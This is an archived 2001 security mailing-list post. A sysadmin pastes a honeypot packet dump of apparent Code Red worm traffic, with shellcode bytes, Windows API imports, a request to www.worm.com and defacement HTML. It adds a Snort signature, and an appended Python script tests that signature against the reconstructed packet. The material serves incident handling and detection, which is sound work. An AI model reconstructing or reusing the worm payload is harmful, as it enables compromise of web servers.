Strange web traffic

From: Scott Nursten (scott.nurstenat_private)
Date: Tue Jul 17 2001 - 11:22:43 PDT


    Hi guys, 
    
    From Thursday last week, I have had thousands (21296) of attempted connects from thousands (7650) of hosts to port 80 on a host on my network that does not have a web server running. I decided to open this up on my firewall and set up a small honeypot to see what the traffic was about. Lo and behold:
    
    
    18:59:07.487672 210.239.180.224.32769 > 194.130.109.164.80: P [tcp sum ok] 2925:4040(1115) ack 1 win 17520 (DF) (ttl 104, id 46743, len 1155)
    0x0000   4500 0483 b697 4000 6806 9fe6 d2ef b4e0        E.....@.h.......
    0x0010   c282 6da4 8001 0050 c56d 3b34 c6fa 9e83        ..m....P.m;4....
    0x0020   5018 4470 5da3 0000 ff8b 8d64 feff ff0f        P.Dp]......d....
    0x0030   be11 85d2 7402 ebd3 8bf4 6a00 8b85 4cfe        ....t.....j...L.
    0x0040   ffff 508b 4d08 8b51 6452 8b85 78fe ffff        ..P.M..QdR..x...
    0x0050   50ff 95c0 feff ff3b f490 434b 434b c785        P......;..CKCK..
    0x0060   4cfe ffff 0000 0000 8b8d 68fe ffff 83c1        L.........h.....
    0x0070   0789 8d64 feff ffeb 1e8b 9564 feff ff83        ...d.......d....
    0x0080   c201 8995 64fe ffff 8b85 4cfe ffff 83c0        ....d.....L.....
    0x0090   0189 854c feff ff8b 8d64 feff ff0f be11        ...L.....d......
    0x00a0   85d2 7402 ebd3 8bf4 6a00 8b85 4cfe ffff        ..t.....j...L...
    0x00b0   508b 8d68 feff ff83 c107 518b 9578 feff        P..h......Q..x..
    0x00c0   ff52 ff95 c0fe ffff 3bf4 9043 4b43 4b8b        .R......;..CKCK.
    0x00d0   4508 8b48 7089 8d4c feff ff8b f46a 008b        E..Hp..L.....j..
    0x00e0   954c feff ff52 8b45 088b 4878 518b 9578        .L...R.E..HxQ..x
    0x00f0   feff ff52 ff95 c0fe ffff 3bf4 9043 4b43        ...R......;..CKC
    0x0100   4bc6 85fc feff ff00 8bf4 6a00 6800 0100        K.........j.h...
    0x0110   008d 85fc feff ff50 8b8d 78fe ffff 51ff        .......P..x...Q.
    0x0120   95c4 feff ff3b f490 434b 434b 8985 4cfe        .....;..CKCK..L.
    0x0130   ffff 8bf4 8b95 78fe ffff 52ff 95c8 feff        ......x...R.....
    0x0140   ff3b f490 434b 434b e90c fbff ffeb fee8        .;..CKCK........
    0x0150   8cf5 ffff eb30 5883 c005 5557 5356 506a        .....0X...UWSVPj
    0x0160   3c8b f083 c60c 5668 0001 0000 ff70 08ff        <.....Vh.....p..
    0x0170   7424 28ff 1058 50ff 7424 18ff 5004 585e        t$(..XP.t$..P.X^
    0x0180   5b5f 5dff 2090 e8cb ffff ffe8 7bf9 ffff        [_].........{...
    0x0190   b878 5634 12b8 7856 3412 b878 5634 12b8        .xV4..xV4..xV4..
    0x01a0   7856 3412 b878 5634 1258 508b bd68 feff        xV4..xV4.XP..h..
    0x01b0   ff89 47f2 c38b 4424 0c05 b800 0000 c700        ..G...D$........
    0x01c0   2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f        *.L.3.........Lo
    0x01d0   6164 4c69 6272 6172 7941 0047 6574 5379        adLibraryA.GetSy
    0x01e0   7374 656d 5469 6d65 0043 7265 6174 6554        stemTime.CreateT
    0x01f0   6872 6561 6400 4372 6561 7465 4669 6c65        hread.CreateFile
    0x0200   4100 536c 6565 7000 4765 7453 7973 7465        A.Sleep.GetSyste
    0x0210   6d44 6566 6175 6c74 4c61 6e67 4944 0056        mDefaultLangID.V
    0x0220   6972 7475 616c 5072 6f74 6563 7400 0969        irtualProtect..i
    0x0230   6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053        nfocomm.dll.TcpS
    0x0240   6f63 6b53 656e 6400 0957 5332 5f33 322e        ockSend..WS2_32.
    0x0250   646c 6c00 736f 636b 6574 0063 6f6e 6e65        dll.socket.conne
    0x0260   6374 0073 656e 6400 7265 6376 0063 6c6f        ct.send.recv.clo
    0x0270   7365 736f 636b 6574 0009 7733 7376 632e        sesocket..w3svc.
    0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
    0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
    0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
    0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
    0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
    0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
    0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
    0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><
    0x0300   6865 6164 3e3c 6d65 7461 2068 7474 702d        head><meta.http-
    0x0310   6571 7569 763d 2243 6f6e 7465 6e74 2d54        equiv="Content-T
    0x0320   7970 6522 2063 6f6e 7465 6e74 3d22 7465        ype".content="te
    0x0330   7874 2f68 746d 6c3b 2063 6861 7273 6574        xt/html;.charset
    0x0340   3d65 6e67 6c69 7368 223e 3c74 6974 6c65        =english"><title
    0x0350   3e48 454c 4c4f 213c 2f74 6974 6c65 3e3c        >HELLO!</title><
    0x0360   2f68 6561 643e 3c62 6164 793e 3c68 7220        /head><bady><hr.
    0x0370   7369 7a65 3d35 3e3c 666f 6e74 2063 6f6c        size=5><font.col
    0x0380   6f72 3d22 7265 6422 3e3c 7020 616c 6967        or="red"><p.alig
    0x0390   6e3d 2263 656e 7465 7222 3e57 656c 636f        n="center">Welco
    0x03a0   6d65 2074 6f20 6874 7470 3a2f 2f77 7777        me.to.http://www
    0x03b0   2e77 6f72 6d2e 636f 6d20 213c 6272 3e3c        .worm.com.!<br><
    0x03c0   6272 3e48 6163 6b65 6420 4279 2043 6869        br>Hacked.By.Chi
    0x03d0   6e65 7365 213c 2f66 6f6e 743e 3c2f 6872        nese!</font></hr
    0x03e0   3e3c 2f62 6164 793e 3c2f 6874 6d6c 3e20        ></bady></html>.
    0x03f0   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0400   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0410   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0420   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0430   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0440   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0450   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0460   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0470   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0480   2020 20                                        ...
    
    
    Any ideas? If this is a worm, it's already got 7650 hosts. I'm logging all of this on my IDS hosts with the following signature:
    alert TCP $EXTERNAL any -> $INTERNAL any (msg: "Hacked by Chinese"; dsize: >1000; flags: P+; content: "|2e776f72 6d2e636f 6d20213c 62723e3c|";)
    
    Having just written the rule and popped it in the IDS, I've seen 34 connections from 11 different hosts. Looks bad. 
    
    Rgds, 
    
    -- 
    
    Scott Nursten - Systems Administrator
    ----------------------------------------------
    ddi:   +44 (0) 1293 744 122
    work:  +44 (0) 1293 402 040
    fax:   +44 (0) 1293 402 050
    email: scottnat_private
    wwweb: http://www.streetsonline.co.uk
    ----------------------------------------------
    
    			"Without order nothing can exist - without chaos nothing can evolve."
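As an added, defender-side example (not part of Scott's post or of any IDS project), the script below rebuilds the packet from a tcpdump -X excerpt and evaluates the three conditions of the Snort signature in the post (dsize >1000, PSH flag set, the 16-byte content ".worm.com !<br><") against it. The dump excerpt is constructed from the lines quoted in the post (header lines, the HTTP-looking text, the line the content keys on, and the final line); the omitted lines are zero-filled, so the payload length equals what the IP total-length field declares. The function names are this example's own.

```python
import re

# Conditions from the Snort rule in the post:
#   dsize: >1000; flags: P+; content: "|2e776f72 6d2e636f 6d20213c 62723e3c|"
RULE_CONTENT = bytes.fromhex("2e776f726d2e636f6d20213c62723e3c")  # ".worm.com !<br><"
RULE_MIN_DSIZE = 1000
TCP_PSH = 0x08

# Constructed excerpt of the tcpdump -X output quoted in the post: the IP/TCP
# header lines, the HTTP-looking text, the line the rule's content matches,
# and the last line (which fixes the total length). Lines in between are omitted.
SAMPLE_DUMP = """
0x0000   4500 0483 b697 4000 6806 9fe6 d2ef b4e0        E.....@.h.......
0x0010   c282 6da4 8001 0050 c56d 3b34 c6fa 9e83        ..m....P.m;4....
0x0020   5018 4470 5da3 0000 ff8b 8d64 feff ff0f        P.Dp]......d....
0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
0x03a0   6d65 2074 6f20 6874 7470 3a2f 2f77 7777        me.to.http://www
0x03b0   2e77 6f72 6d2e 636f 6d20 213c 6272 3e3c        .worm.com.!<br><
0x03c0   6272 3e48 6163 6b65 6420 4279 2043 6869        br>Hacked.By.Chi
0x0480   2020 20                                        ...
"""


def parse_tcpdump_hex(text):
    """Rebuild a packet from tcpdump -X style lines.

    Each hex line is written at the offset it declares, so a partial excerpt
    keeps every byte at its true position; offsets not covered stay zero.
    """
    chunks = {}
    for line in text.splitlines():
        # offset, hex groups and ASCII column are separated by 2+ spaces
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) < 2 or not re.fullmatch(r"0x[0-9a-fA-F]+", parts[0]):
            continue
        hexpart = parts[1].replace(" ", "")
        if not re.fullmatch(r"[0-9a-fA-F]*", hexpart) or len(hexpart) % 2:
            continue
        chunks[int(parts[0], 16)] = bytes.fromhex(hexpart)
    if not chunks:
        return b""
    buf = bytearray(max(off + len(d) for off, d in chunks.items()))
    for off, d in chunks.items():
        buf[off:off + len(d)] = d
    return bytes(buf)


def tcp_flags_and_payload(packet):
    """Return (tcp_flags, payload) from a raw IPv4/TCP packet.

    Header lengths come from the IP IHL and TCP data-offset fields; the IP
    total-length field bounds the payload so trailing bytes are ignored.
    """
    if len(packet) < 40:
        return 0, b""
    ihl = (packet[0] & 0x0F) * 4
    total_len = int.from_bytes(packet[2:4], "big")
    data_off = (packet[ihl + 12] >> 4) * 4
    flags = packet[ihl + 13]
    return flags, packet[ihl + data_off:total_len]


def rule_matches(packet):
    """Evaluate the post's three rule conditions against one packet."""
    flags, payload = tcp_flags_and_payload(packet)
    return (len(payload) > RULE_MIN_DSIZE        # dsize: >1000
            and bool(flags & TCP_PSH)             # flags: P+ (PSH plus any others)
            and RULE_CONTENT in payload)          # content: ".worm.com !<br><"


if __name__ == "__main__":
    pkt = parse_tcpdump_hex(SAMPLE_DUMP)
    flags, payload = tcp_flags_and_payload(pkt)
    print(f"packet {len(pkt)} bytes, TCP flags 0x{flags:02x}, "
          f"dsize {len(payload)}, rule match: {rule_matches(pkt)}")
```

Run on the excerpt it reports a 1155-byte packet with flags 0x18 (PSH|ACK), a 1115-byte payload and a match. Feeding it only the first 100 bytes of the packet shows the dsize condition failing, which is the case a tuned rule also has to consider: the content string sits about 950 bytes into this segment, so any reassembly or fragmentation that splits it across packets would defeat a single-packet match.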
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:44:18 PDT